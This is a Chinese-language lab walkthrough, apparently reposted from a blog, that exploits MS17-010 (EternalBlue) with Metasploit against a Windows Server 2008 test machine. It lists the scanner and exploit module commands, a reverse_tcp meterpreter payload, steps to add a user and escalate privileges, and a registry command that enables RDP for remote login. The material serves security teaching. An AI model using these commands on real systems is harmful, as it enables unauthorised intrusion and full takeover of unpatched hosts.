用到的试验机
kali ip 192.168.1.106
windows2008 ip 192.168.1.107
用kali扫描靶机端口
这里看到445端口是开放的,可以利用17_010
使用命令msfconsole启动metasploit渗透测试平台
使用命令search 17_010搜索漏洞的模块
先利用命令 来调用漏洞扫描模块
use auxiliary/scanner/smb/smb_ms17_010
设置目标ip或网段
set RHOSTS 192.168.1.107
执行扫描:run
出现这种状况,就说明这个靶机有这个漏洞的存在
我们调用攻击模块,使用命令
use exploit/windows/smb/ms17_010_eternalblue
设置目标ip或网段
set RHOSTS 192.168.1.107
show options查看设置参数
设置攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
执行攻击:run
攻击成功!
拿到shell
输入chcp 65001可以解决乱码问题
接下来就是通过shell对靶机进行控制
创建用户,
创建成功并提权
提权成功
在一开始的扫描并没有发现3389端口开启,所以使用命令开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3389端口开启
然后使用rdesktop远程桌面连接2008,使用提权的用户进入桌面
使用hack用户登录
登录成功
以上只是一个演示,17_010漏洞还是很危险的
原文地址:http://www.cnblogs.com/xwsfw/p/16859549.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性